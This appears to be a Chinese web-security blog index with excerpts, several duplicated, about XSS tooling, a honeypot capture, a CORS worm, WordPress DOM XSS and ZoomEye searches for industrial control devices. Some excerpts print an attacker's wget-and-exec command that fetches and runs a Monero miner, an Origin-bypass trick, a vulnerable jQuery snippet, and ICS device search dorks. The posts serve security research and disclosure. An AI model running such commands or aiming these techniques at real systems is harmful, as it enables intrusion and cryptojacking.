用了很久了，推荐下这个：Wordfence Security细节自己体验吧，说点别的。WordPress生态这么多年一直没变，安全生态也如此。如此开放的生态，短板都给了那些插件，插件一旦出个安全问题危害是很直接的。WordPress这种生态设计是没有所谓的安全沙箱。插件的安全问题交给了插件自己解决，于是第三方安全插件也在发展。但是有个尴尬的大势所趋，Blog 这种大生态现在越来越尴尬，自己搭建 Blog 已经不像曾经那样时髦。大环境变了，这种第三方安全插件的收益估计也会很尴尬。WordPress 这个全球最流行的 Blog 系统，有个非常重要的连接设计是 RSS，可惜越来越少人在意 RSS，每一个 Blog 都犹如孤岛一般存在，不再热闹。这个时代发展实在太快，信息大爆炸如此，谁会在意这座孤岛？都已经是孤岛，但别荒废长草，安全这道护城河，做好不难。 ...继续阅读 (6)

XSS’OR 开源了。采用 BSD 开源协议，很宽松，不限制传播与商业化，留下作者版权就好。在下面这个 GitHub 页面上，你不仅可以得到 XSS’OR 的源码，还可以了解如何自己搭建一个。https://github.com/evilcos/xssor2简单说明下：上线之后（xssor.io），使用频率还不错。源码是 Python 及 JavaScript，采用了 Django、Bootstrap、jQuery 三个优秀框架，可以完整覆盖前后端，基于这三个框架，开发速度非常的快，整个过程消耗我不到一周时间，其中一半耗时在软件设计上。感兴趣这个过程的，可以读这套源码，很简洁，在开发过程中我特意去掉数据库（因为我觉得我这个应用场景其实不需要数据库）。既然开源了，后续应该会和新组建的 ATToT 安全团队一起去完善它。XSS’OR 信息量不小，如果你也玩前端黑，好好玩^_^。 ...继续阅读 (7)

这是一个在线免费的前端黑工具，目前主要包含 3 大模块：1. Encode/Decode加解密模块，包含：前端黑相关的加解密，代码压缩、解压、美化、执行测试，字符集转换，哈希生成，等。2. Codz代码模块，包含：CSRF 请求代码生成，AJAX 请求代码生成，XSS 攻击矢量，XSS 攻击 Payload，等。3. Probe探针模块，为了平衡，这是一个最基础的探针，且每个 IP 每天都可以生成一个唯一探针，使用者可以用这个探针发起攻击测试（如：XSS、钓鱼攻击等），探针可以获取目标用户的基本信息，使用者还可以动态植入更多的命令(JavaScript Codz)进行“远控”测试。一些用户体验与隐私考虑：XSS’OR，即使你浏览器不小心关掉或奔溃，你的记录也不会丢，因为相关记录都缓存到了你的浏览器本地。服务器不会存储你的任何隐私，除了 Probe 的结果记录（仅是结果记录）会临时性缓存，这是因为设计考虑，但每天0点都会自动清除。放心使用吧！地址：xssor.io如果你有好的想法与贡献，我们采纳后，会在 XSS’OR 致谢榜上感谢你。 ...继续阅读 (5)

这是一个在线免费的前端黑工具，目前主要包含 3 大模块：1. Encode/Decode加解密模块，包含：前端黑相关的加解密，代码压缩、解压、美化、执行测试，字符集转换，哈希生成，等。2. Codz代码模块，包含：CSRF 请求代码生成，AJAX 请求代码生成，XSS 攻击矢量，XSS 攻击 Payload，等。3. Probe探针模块，为了平衡，这是一个最基础的探针，且每个 IP 每天都可以生成一个唯一探针，使用者可以用这个探针发起攻击测试（如：XSS、钓鱼攻击等），探针可以获取目标用户的基本信息，使用者还可以动态植入更多的命令(JavaScript Codz)进行“远控”测试。一些用户体验与隐私考虑：XSS’OR，即使你浏览器不小心关掉或奔溃，你的记录也不会丢，因为相关记录都缓存到了你的浏览器本地。服务器不会存储你的任何隐私，除了 Probe 的结果记录（仅是结果记录）会临时性缓存，这是因为设计考虑，但每天0点都会自动清除。放心使用吧！地址：xssor.io如果你有好的想法与贡献，我们采纳后，会在 XSS’OR 致谢榜上感谢你。 ...继续阅读 (11)

今天凌晨，我们的蜜网系统跳出了个有趣的字符串：zaxa2aq@protonmail.comProtonMail！前段时间我们的分享（推荐安全且匿名的邮箱 ProtonMail）似乎暗示着某种巧合，这不得不引起我们的兴趣。意料之内，匿名是把双刃剑，剑的另一端，“匿名之恶”会让人性丑恶发挥到极致。以前我说过，黑暗森林法则同样适用于这个网络空间：被发现即被干掉。不好意思，这次是我们“干掉”了对方。上面这个字符串完整内容是：(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &)我简单解释下这条 Bash 命令：1.exec，负责执行后面的命令，细节用途自行查阅。2./var/tmp/.war/1，这个文件由下面这条命令创建：wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/13.1 == minerd4.minerd 之后的参数：-a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x目测和 ...继续阅读 (14)

今天凌晨，我们的蜜网系统跳出了个有趣的字符串：zaxa2aq@protonmail.comProtonMail！前段时间我们的分享（推荐安全且匿名的邮箱 ProtonMail）似乎暗示着某种巧合，这不得不引起我们的兴趣。意料之内，匿名是把双刃剑，剑的另一端，“匿名之恶”会让人性丑恶发挥到极致。以前我说过，黑暗森林法则同样适用于这个网络空间：被发现即被干掉。不好意思，这次是我们“干掉”了对方。上面这个字符串完整内容是：(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &)我简单解释下这条 Bash 命令：1.exec，负责执行后面的命令，细节用途自行查阅。2./var/tmp/.war/1，这个文件由下面这条命令创建：wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/13.1 == minerd4.minerd 之后的参数：-a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x目测和 ...继续阅读 (6)

新年新气象，这个蠕虫我做了小范围测试，也提交了官方修复，小圈子里做了分享，这里正式对外公布下，出于研究而非破坏为目的，供大家参考。IAMANEWBOTNAMEDCORSBOT——-BOT PoC——-http://evilcos.me/lab/IAMANEWBOTNAMEDCORSBOT.TXT完整代码直接见上面这个链接即可。里面需要特别注意的两个点：Conten-Type是JSONOrigin是：huaban.com.al3rt.io，这个小技巧直接绕过花瓣的Origin判断所以，蠕虫得以传播。本质是：CORS(Cross-Origin Resource Sharing)的滥用导致，效果图：最后，友情提示下：这个问题还是比较普遍的。脑洞怎么开，玩起来才会知道，不玩永远想不到:-) ...继续阅读 (5)

新年新气象，这个蠕虫我做了小范围测试，也提交了官方修复，小圈子里做了分享，这里正式对外公布下，出于研究而非破坏为目的，供大家参考。IAMANEWBOTNAMEDCORSBOT——-BOT PoC——-http://evilcos.me/lab/IAMANEWBOTNAMEDCORSBOT.TXT完整代码直接见上面这个链接即可。里面需要特别注意的两个点：Conten-Type是JSONOrigin是：huaban.com.al3rt.io，这个小技巧直接绕过花瓣的Origin判断所以，蠕虫得以传播。本质是：CORS(Cross-Origin Resource Sharing)的滥用导致，效果图：最后，友情提示下：这个问题还是比较普遍的。脑洞怎么开，玩起来才会知道，不玩永远想不到:-) ...继续阅读 (7)

计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧，除了那些老套的手法之外：https://github.com/evilcos/papers我公布的Papers里有个PPT是《CSRF攻击-苏醒的巨人》，可以参考。还包括以前提的Flash CSRF/XSF等方式，细节可以温习去年我的Paper（隐蔽的战场—Flash Web攻击），希望Flash是日不落帝国，虽然现在快日落了，但是不影响我们的最后挣扎。除了这些，当然会有新的玩意，比如JSON Hijacking就一直在进化。还有去年很火的WormHole，这是JSON Hijacking本地攻击的一种延伸，点击下这个试试：http://evilcos.me/lab/pac.html探测你本地是否用Shadowsocks，当然你即使用了也不一定会弹，毕竟我测试的端口仅仅是默认的8788（如果你不是这个端口，你可以改为这个端口试试）。以前我说过：玩CSRF，最爽的是结合了Flash，无声无息…最近在做路由器安全研究，以及昨晚做了个新型蠕虫的测试：给我带来的结论是：Flash，你可以安息了，感谢HTML5，以后玩CSRF同样可以很优雅。我为什么Demo这只蠕虫？因为这确实是个影响会很深远的安全问题。在我过去两年做的《程序员与黑客》第一季与第二季的演讲，里面有个核心点就是：程序员与黑客思维的差异，导致一些类型的安全问题可以 ...继续阅读 (8)

计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧，除了那些老套的手法之外：https://github.com/evilcos/papers我公布的Papers里有个PPT是《CSRF攻击-苏醒的巨人》，可以参考。还包括以前提的Flash CSRF/XSF等方式，细节可以温习去年我的Paper（隐蔽的战场—Flash Web攻击），希望Flash是日不落帝国，虽然现在快日落了，但是不影响我们的最后挣扎。除了这些，当然会有新的玩意，比如JSON Hijacking就一直在进化。还有去年很火的WormHole，这是JSON Hijacking本地攻击的一种延伸，点击下这个试试：http://evilcos.me/lab/pac.html探测你本地是否用Shadowsocks，当然你即使用了也不一定会弹，毕竟我测试的端口仅仅是默认的8788（如果你不是这个端口，你可以改为这个端口试试）。以前我说过：玩CSRF，最爽的是结合了Flash，无声无息…最近在做路由器安全研究，以及昨晚做了个新型蠕虫的测试：给我带来的结论是：Flash，你可以安息了，感谢HTML5，以后玩CSRF同样可以很优雅。我为什么Demo这只蠕虫？因为这确实是个影响会很深远的安全问题。在我过去两年做的《程序员与黑客》第一季与第二季的演讲，里面有个核心点就是：程序员与黑客思维的差异，导致一些类型的安全问题可以 ...继续阅读 (8)

当代 Web 的 JSON 劫持技巧http://paper.seebug.org/130/猥琐流的家伙居然在OWASP重出江湖而且加入了Burp Suite那家公司。这篇技巧核心是__proto__，可以理解为JavaScript曾经的prototype在ES6里的增强，当代浏览器基本都支持了这个新标准。这个跨域技巧很有意思的，不过目前实战利用上“暂时鸡肋”…里面还有个亮点是UTF-16BE技巧，这个技巧除了注意字符集差异带来的安全问题之外，还应该注意下：浏览器对待MIME类型检查的态度差异…重点来了，欢迎更多人投稿安全技术文章给Seebug Paper，公益性的:-)投稿方式见：http://paper.seebug.org/call-for-paper/ ...继续阅读 (5)

当代 Web 的 JSON 劫持技巧http://paper.seebug.org/130/猥琐流的家伙居然在OWASP重出江湖而且加入了Burp Suite那家公司。这篇技巧核心是__proto__，可以理解为JavaScript曾经的prototype在ES6里的增强，当代浏览器基本都支持了这个新标准。这个跨域技巧很有意思的，不过目前实战利用上“暂时鸡肋”…里面还有个亮点是UTF-16BE技巧，这个技巧除了注意字符集差异带来的安全问题之外，还应该注意下：浏览器对待MIME类型检查的态度差异…重点来了，欢迎更多人投稿安全技术文章给Seebug Paper，公益性的:-)投稿方式见：http://paper.seebug.org/call-for-paper/ ...继续阅读 (9)

Seebug Paper之前收录了三篇文章有些关联性，分别是：绕过混合内容警告 – 在安全的页面加载不安全的内http://paper.seebug.org/112/检测本地文件躲避安全分析http://paper.seebug.org/87/基于浏览器的指纹识别：影响和缓解措施http://paper.seebug.org/64/有个关键点是：混合内容的安全性。这里提到的主要是协议的混合，如https/http/file/res/mhtml等，现代浏览器逐渐开始隔离这些协议，比如https下加载http的内容时，给出安全提示；再比如“修补”file/res/mhtml这些协议在http协议的网页里带来的安全问题，如本地文件探测（常见的是杀软探测）。玩前端Hack的都知道，修补与绕过总是在博弈，而且浏览器们的修补是存在差异的，也就是可能出现浏览器安全差异。很早以前，我在写https协议下的XSS exp时，就注意到：当载入http内容时，浏览器的安全提示。后来解决方案是采用DOM动态操作来绕过，这个技巧和第一篇文章里提的一样。为什么这样可以？这个关键点就是浏览器安全机制的触发机制，采用DOM动态操作时，这个浏览器安全机制并不会触发。我的理解是DOM的操作实在过于繁杂，为了性能平衡，许多浏览器安全机制并不会触发，而仅在页面加载时触发。当然，我也认为这种理解不总是成立，具体 ...继续阅读 (3)

Seebug Paper之前收录了三篇文章有些关联性，分别是：绕过混合内容警告 – 在安全的页面加载不安全的内http://paper.seebug.org/112/检测本地文件躲避安全分析http://paper.seebug.org/87/基于浏览器的指纹识别：影响和缓解措施http://paper.seebug.org/64/有个关键点是：混合内容的安全性。这里提到的主要是协议的混合，如https/http/file/res/mhtml等，现代浏览器逐渐开始隔离这些协议，比如https下加载http的内容时，给出安全提示；再比如“修补”file/res/mhtml这些协议在http协议的网页里带来的安全问题，如本地文件探测（常见的是杀软探测）。玩前端Hack的都知道，修补与绕过总是在博弈，而且浏览器们的修补是存在差异的，也就是可能出现浏览器安全差异。很早以前，我在写https协议下的XSS exp时，就注意到：当载入http内容时，浏览器的安全提示。后来解决方案是采用DOM动态操作来绕过，这个技巧和第一篇文章里提的一样。为什么这样可以？这个关键点就是浏览器安全机制的触发机制，采用DOM动态操作时，这个浏览器安全机制并不会触发。我的理解是DOM的操作实在过于繁杂，为了性能平衡，许多浏览器安全机制并不会触发，而仅在页面加载时触发。当然，我也认为这种理解不总是成立，具体 ...继续阅读 (10)

《Web前端黑客技术揭秘》这本书2013.1月开售至今，已经第10次印刷，在安全类书籍中，这种成绩确实超出我们的意料。回头看看这一路记录的一些文字也是挺有意思的：http://evilcos.me/?tag=book还有本书官网http://web2hack.org/上的“消息列表”。作为过来人，写书虽然是一件很有成就感的事，但是机会成本可能太高，而且真的很痛苦，除非你本身就是个写作爱好者。感谢所有的支持者。书出版到现在已经快4年了，确实很多知识可以更新，至于本书的第二版是否会出，且看某人是否真的有足够勇气继续承受这种压力，当然某人的勇气多少也会拉我再次入那么点火坑。哎… ...继续阅读 (1)

《Web前端黑客技术揭秘》这本书2013.1月开售至今，已经第10次印刷，在安全类书籍中，这种成绩确实超出我们的意料。回头看看这一路记录的一些文字也是挺有意思的：http://evilcos.me/?tag=book还有本书官网http://web2hack.org/上的“消息列表”。作为过来人，写书虽然是一件很有成就感的事，但是机会成本可能太高，而且真的很痛苦，除非你本身就是个写作爱好者。感谢所有的支持者。书出版到现在已经快4年了，确实很多知识可以更新，至于本书的第二版是否会出，且看某人是否真的有足够勇气继续承受这种压力，当然某人的勇气多少也会拉我再次入那么点火坑。哎… ...继续阅读 (7)

说 OAuth2.0 漏洞/这个协议不安全的人，把头伸过来下，砖头准备好了。Black Hat 的有关 Paper：《OAuth User Profile Attack – How to Sign into One Billion Mobile App Accounts Effortlessly》本质问题在于一些 App 在使用 OAuth2.0 协议时，（估计为了简单）使用的是 Implicit Flow 模式，然而并没严格按照协议的要求去实现，导致可能出现的劫持攻击。这并不是说 OAuth2.0 本身有漏洞或这个协议本身不安全，就好像两年多前的心脏出血漏洞，问题不在于 SSL 这个协议本身，而在于其某种实现方式（OpenSSL）有缺陷。一些媒体文的专业性一直是被诟病的，搞安全的人不要轻信媒体文。结论与建议看 Paper 的倒数3、2页。补充说明：这种攻击的出现，只能说明相关开发文档没写清楚及 OAuth2.0 协议本身的实现上有缺陷（没做好应有的安全校验），这让我想起两年多前的OAuth2.0 劫持缺陷，当时劫持的是目标网站（如知乎）的目标用户（如黄继新）的账号权限，配合了 CSRF，拿到黄继新的 Access Token，最终控制了他的账号。不过这个议题的问题不一样，可以认为是用你事先准备好的恶意账号去绑定目标 App 的目标用户的账号权限，既然是针对 App 的 ...继续阅读 (2)

说 OAuth2.0 漏洞/这个协议不安全的人，把头伸过来下，砖头准备好了。Black Hat 的有关 Paper：《OAuth User Profile Attack – How to Sign into One Billion Mobile App Accounts Effortlessly》本质问题在于一些 App 在使用 OAuth2.0 协议时，（估计为了简单）使用的是 Implicit Flow 模式，然而并没严格按照协议的要求去实现，导致可能出现的劫持攻击。这并不是说 OAuth2.0 本身有漏洞或这个协议本身不安全，就好像两年多前的心脏出血漏洞，问题不在于 SSL 这个协议本身，而在于其某种实现方式（OpenSSL）有缺陷。一些媒体文的专业性一直是被诟病的，搞安全的人不要轻信媒体文。结论与建议看 Paper 的倒数3、2页。补充说明：这种攻击的出现，只能说明相关开发文档没写清楚及 OAuth2.0 协议本身的实现上有缺陷（没做好应有的安全校验），这让我想起两年多前的OAuth2.0 劫持缺陷，当时劫持的是目标网站（如知乎）的目标用户（如黄继新）的账号权限，配合了 CSRF，拿到黄继新的 Access Token，最终控制了他的账号。不过这个议题的问题不一样，可以认为是用你事先准备好的恶意账号去绑定目标 App 的目标用户的账号权限，既然是针对 App 的 ...继续阅读 (5)

ZMap确实是个伟大的工具，但离伟大的社区、伟大的产品还有挺长的路要走。ZMap现在稳定版本是：zmap-2.1.0，下一个大版本是3，作者的野心应该是很大的，但是3能否顺利出来，出来能否得到更好口碑，就真不好说了。天坑对于ZMap来说，最大的使用成本在于：不是谁都能像ZoomEye/Shodan那样的大工程拥有足够的硬件环境（包括机房环境），一个不小心就是被封。这是ZMap最大的坑，我们称之为天坑，这种天坑无形中也形成了足够的竞争门槛。但是这个天坑除了土豪一把也不是没办法填上，比如有的人就动了那么点洪荒之力，如“Internet Census 2012 ”工程，这个洪荒之力就是“Carna Botnet“。细节（不知道有多少人真的研读了）：http://internetcensus2012.bitbucket.org/paper.html跑个小题：在职场上，我经常建议一些新人好好珍惜当前职场给你的发展空间，很多人不明白什么是发展空间，甚至很难意识到自己正处在一个得天独厚的发展空间里，比如进入ZoomEye工程，那些硬件环境瞬间可以把你的格局拉高一个档次；再比如进入运营商核心网络，无论是作为核心员工进入还是作为乙方安全服务进入，这种天赐良机不把握好，简直是“暴殄天物”；不用过多举例，你可以举一反三。这些都是你未来拥有的竞争门槛。几个小坑ZMap的天坑是不能怪ZMap的，这是没办法的 ...继续阅读 (6)

今年如果再不更新一篇，那就过了。随便说说几句吧，关于“航海图”的。大概，2013年7月，我们发布ZoomEye这个项目，上线了开放式的网络空间搜索引擎：https://www.zoomeye.org，当时被认为是一种非常天马行空的想法。中文名取名为钟馗之眼，不过这个中文名倒是一直弱化着，包括我在内，大家都喜欢喊ZoomEye这个英文。我一直觉得这是我取名最成功的一次，这个项目我一直牵头至今年上半年结束。去年我的演讲：发现网络空间里的「暗物质」情报，给我个人带来的感觉是：这个领域如果不深入就太可惜了，多么令人着迷的领域。这对我来说跨度确实很大，以前玩前端Hack，写了不少文章，出了一本书，写了一些小工具及半成品，还有个从未公布的利用平台。但是一旦进入ZoomEye的领域，以前擅长的玩意基本可以废弃，可以延续的只有Hack思维及一些编程经验了。从保值趋势来看，这条路非常值。网络空间如大海之复杂，吃透它，需要一张航海图，一张真正的航海图，而我不得不如海盗一样去思考。好了，随便说说结束。刚刚整理Blog时，看我以前写的东西还是挺有意思的:-) ...继续阅读 (4)

Paper 在这：https://github.com/evilcos/papers，找「发现网络空间里的“暗物质”情报」。这个演讲是 ZoomEye Team 的近期结果汇总，当然你不仅可以了解到我们在做什么，还可以知道我们在这个网络空间「汪洋」里的经验。我们得像「海盗」那样做事，才能做好安全研究，因为地下黑客正是如此。Enjoy ...继续阅读 (18)

这个议题是为本次 XCon 2015 准备的，讲完 XCon，办完自家的 KCon 后，我终于有点时间能来更新点内容了。Flash Web 攻击是 Web2.0 Hacking 的一个重要分支，不过纵观全球，研究这个领域的人相对来说是很少的，这个领域有几个特殊性：1. 需要较强的背景知识，虽然 Flash 的脚本语言（ActionScript）与 JavaScript 类似2. 权限模型比起 DOM 的权限来说复杂得多3. Flash 的开发安全更加不受重视4. HTML5 不出两年就会淘汰掉 Flash，导致这个领域已经是日落帝国虽然如此，Flash Web 攻击还是留下了许多经典姿势，我这个 PPT 里的内容大多数来说并不是新的，但却很少被剖析提及。这次我来收个尾，1是向 Flash 致敬，2是这些研究的思维沉淀让我很是受益，你也应该会感兴趣我的议题已经放在这：https://github.com/evilcos/papers中英文都有，欢迎品味。拥抱 HTML5 吧 ...继续阅读 (25)

WordPress 被爆 DOM XSS 漏洞，数百万站点受影响，危险等级为极高。该漏洞存在于 WordPress 流行的 Genericons example.html 页面中，默认主题 Twenty Fifteen 及知名插件 Jetpack 都内置了该页面，由于 example.html 使用了老版本存在 DOM XSS 缺陷的 jQuery，且使用不当，导致出现 DOM XSS，这种攻击将无视浏览器的 XSS Filter 防御。漏洞本质代码：var x = window.location.hash.split('#')[1];jQuery('.' + x);老洞开新花，这是正常的…修补方案：删除WordPress目录下所有包含「1.7.2/jquery.min.js」的example.html，如：/wp-content/themes/twentyfifteen/genericons/example.html当然<=1.8.3都应该删掉，不想删就把jQuery替换为新版本。赶紧修补吧各位，不谢。参考：http://wptavern.com/xss-vulnerability-in-jetpack-and-the-twenty-fifteen-default-theme-affects-millions-of-wordpress-usershttps://cor ...继续阅读 (20)

WordPress 双连发存储通杀 XSS 就这样爆爆爆！可惜之余，说下：这种字符集不一致导致的问题会是个普遍问题，不仅是导致 XSS；要完美通杀或 IE 通杀得理解 CSS 导致的一些本质特性；截断问题真是个可爱问题；WordPress 的过滤机制真可爱；我们团队的应急真赞；具体链接：https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/修补之后，由于 MySQL text 类型的字段最大 64K，之后就截断，又导致 XSS。无论怎么修补吧，utf8mb4 字符集的引入会是 WordPress 等 Web 组件其中一个噩梦的开始。具体细节自己去摸索吧。 ...继续阅读 (23)

去年这个时候，ZoomEye 的第一次大战役，我带队通宵应急，隐约觉得这一定会载入史册，现在看来当时的努力是对的。昨天团队再次通宵为了把细节做得尽可能的好，这次我没带队，因为他们已经成熟了，公司的硬件设施还不错，再加上一个美女慰问师，那些后勤问题都可以很好解决了…我们上线了心脏出血一周年专题，如下：http://www.zoomeye.org/lab/heartbleed/2015最后还放出的1000只「绵羊」，也许有争议，也许继续这样冷淡下去。对了，如果你想加入 ZoomEye Team，可以简历投给我：evilcos@gmail.com，我一定可以让你感受那种心跳:) ...继续阅读 (20)

最近在玩一加，按照 Kali NetHunter 的官方说明打造一部名副其实的黑客手机，已经进入实战测试，当然有的时候玩这个不一定手机合适，比如本地跑字典时，某些场景下有个高性能服务器当然最好:)感兴趣的同学可以围观：http://zhuanlan.zhihu.com/evilcos/19961466这个专栏链接将持续更新，如果顺利的话，每周末会写一篇，按照我「偷懒」的风格。目前已经有三篇了。Think, then Do:)另外，博客换了个服务器，目前看来还不错。 ...继续阅读 (28)

昨天，YOCSEF 工业控制系统安全会议上，我做了“网络空间工控设备的发现与入侵”分享。当时我说这个领域对我们来说是个新领域，真正的研究也就花了半个来月，但是突击后的效果还是明显的，因为这次是5人组成的临时 Team，其中一人是工控安全本身就很有经验的 Z-0ne 同学，另外几位来自 ZoomEye Team。虽说有些成果，但是我感觉也才入了些门，这个领域要做好，还得继续。之后，我们会在 ZoomEye 上来个工控专题，这次的突击研究，让我们觉得工控架构真是最脆弱的重要架构:)PPT 在下面这个页面：https://github.com/evilcos/papersZoomEye Dorks:EtherNet/IPhttp://www.zoomeye.org/search?q=port%3A44818&t;=hostModbushttp://www.zoomeye.org/search?q=port%3A502&t;=hostIEC 61870-5-101/104http://www.zoomeye.org/search?q=port:2404&t;=hostSiemens S7http://www.zoomeye.org/search?q=port:102 app:”Siemens S7 PLC”&t;=hostTridium Niagara Foxhtt ...继续阅读 (16)

博客升级了下，我把一个月前的这篇文章转篇过来。这次我在 QCon 上海做了《程序员与黑客》的演讲，得到很多认可，这点很欣慰。不过演讲超时20分钟，这点不应该。很多同学意犹未尽，我也是。这篇文章我说说，我为什么要讲这个议题。我2008年毕业就进入网络安全公司知道创宇，跟随几个老大创业，从一个几人团队，到现在有了一定规模，这个过程经历过：国家相关单位、传统企业、互联网企 业的许多安全项目，自己的角色也经历多种（在创业团队，基本就是特种兵，这种成长是非常酷的，如果你能承受住），我的经历让我对一名真正黑客有一个非常强 烈的看法：黑客是一个守正出奇且具备创造力的群体！大家可以看出，我对黑客的理解并不是那种狭义黑客。要成为我理解的这种黑客，首先必须是一名狭义黑客（攻击防御、过招拆招），然后必须具备足够强的研发与工程化能力，这样才能具备创造力！关于这个观点可以查看我历史文章：《我眼中的黑客》。因为有这些经历，我见到太多企业的安全迷茫，这几年黑客事件越发频繁，这些企业往往手无足措，就好像案板上的鱼肉，任人宰割。不仅做坏事的黑客（黑帽黑客）要狠狠宰一把，敲诈也好、拖库也罢，只要入侵进去了，无道义的某些黑帽黑客，会把入侵做绝，细思恐极。一些不靠谱的安全厂商也 会趁机宰一把，为了追求利益最大化，给出极其不透明的安全解决方案！安全解决方案如果不够透明，就很可能给这些企业带去恐吓与忽悠。甚至某些黑帽黑客打着 ...继续阅读 (16)

在这样混乱的互联网上，军阀割据的地盘中，你根本身不由己，当你接入互联网或陌生人的那一刻，你的隐私就失控了。拿到你隐私的坏蛋，他们可以偷窥你，可以诈骗你或你身边的人，可以利用你的隐私做出下三滥的事。他们不会可怜你，你得学几招保护自己，保护你重要的人……我特别准备了一个专页来不断科普更新隐私保护的技巧，这：http://evilcos.me/yinsi.html ...继续阅读 (14)

平时工作过于忙碌，技术的敏感度稍显滞后，好在隐隐感觉黑哥与小熊在群里提到的Flash 0day特性（CVE-2014-4671）具备非常大的价值，于是保存了笔记，晚上抽空断断续续研究了下，才意识到这个0day的价值。原文链接：http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/乌云昨天出了个翻译：http://drops.wooyun.org/tips/2554大家可以先对照着读读，理解这个0day需要一些背景知识：1. 了解Flash在前端安全的地位，关于这点毫不避讳地推荐阅读我们这本书《Web前端黑客技术揭秘》第二章关于Flash安全的描述，内容很全面清晰；2. 了解CSRF攻击的本质，同样我们的书也提了；3. 了解JSONP，随便百度下你就知道；这次Flash 0day特性实际上是对Flash文件格式的一次Hack（CWS压缩，采用的是zlib里的DEFLATE压缩算法），这种Hack的具体实现我没仔细理解，Hack之后的结果是Flash文件可以用ASCII码来完全表示（且是纯字母数字），这个会导致什么后果呢？我慢慢道来：1.曾经我们玩浏览器解析Hack时都明白一个道理，如何让浏览器错误识别文件格式，即MIME类型，比如根据文件名后缀、Content-Type响应头、文件内容等。题外话：这种判断规则在不同 ...继续阅读 (11)